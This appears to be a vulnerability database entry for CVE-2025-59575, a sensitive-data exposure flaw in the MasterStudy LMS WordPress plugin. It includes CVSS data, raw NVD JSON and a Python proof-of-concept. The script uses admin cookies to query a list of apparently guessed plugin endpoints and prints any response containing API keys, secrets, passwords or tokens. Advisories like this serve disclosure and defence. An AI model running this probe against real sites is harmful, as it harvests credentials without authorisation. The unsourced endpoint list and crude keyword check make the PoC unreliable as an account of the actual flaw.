Security Vulnerability Report
中文
CVE-2025-59575 CVSS 4.9 MEDIUM

CVE-2025-59575

Published: 2025-10-22 15:15:56
Last Modified: 2026-04-29 10:16:51

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Stylemix MasterStudy LMS masterstudy-lms-learning-management-system allows Retrieve Embedded Sensitive Data.This issue affects MasterStudy LMS: from n/a through <= 3.6.20.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

MasterStudy LMS <= 3.6.20

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59575 PoC - MasterStudy LMS Sensitive Data Exposure # This PoC demonstrates the sensitive information disclosure vulnerability # Requires high privileges (admin access) import requests import json TARGET_URL = "http://target-wordpress-site.com" # Authentication cookies with admin privileges required COOKIES = { "wordpress_logged_in_xxx": "admin_session_token" } def exploit_sensitive_data_exposure(): """ Exploit for CVE-2025-59575 MasterStudy LMS <= 3.6.20 sensitive data exposure """ print("[*] CVE-2025-59575 - MasterStudy LMS Sensitive Data Exposure") print(f"[*] Target: {TARGET_URL}") # Common vulnerable endpoints in MasterStudy LMS vulnerable_endpoints = [ "/wp-json/masterstudy/v1/settings", "/wp-json/masterstudy/v1/config", "/?rest_route=/masterstudy/v1/settings", "/wp-admin/admin-ajax.php?action=stm_lms_get_settings" ] for endpoint in vulnerable_endpoints: url = f"{TARGET_URL}{endpoint}" try: response = requests.get(url, cookies=COOKIES, timeout=10) if response.status_code == 200: data = response.json() # Check for sensitive data patterns sensitive_keys = ['api_key', 'secret', 'password', 'token', 'key'] for key in sensitive_keys: if key.lower() in json.dumps(data).lower(): print(f"[!] Potential sensitive data found at {endpoint}") print(f"[!] Response preview: {str(data)[:500]}") return True except Exception as e: print(f"[-] Error accessing {endpoint}: {e}") print("[*] No obvious sensitive data exposure detected") return False if __name__ == "__main__": exploit_sensitive_data_exposure()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59575", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:55.833", "lastModified": "2026-04-29T10:16:51.390", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Stylemix MasterStudy LMS masterstudy-lms-learning-management-system allows Retrieve Embedded Sensitive Data.This issue affects MasterStudy LMS: from n/a through <= 3.6.20."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/masterstudy-lms-learning-management-system/vulnerability/wordpress-masterstudy-lms-plugin-3-6-20-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}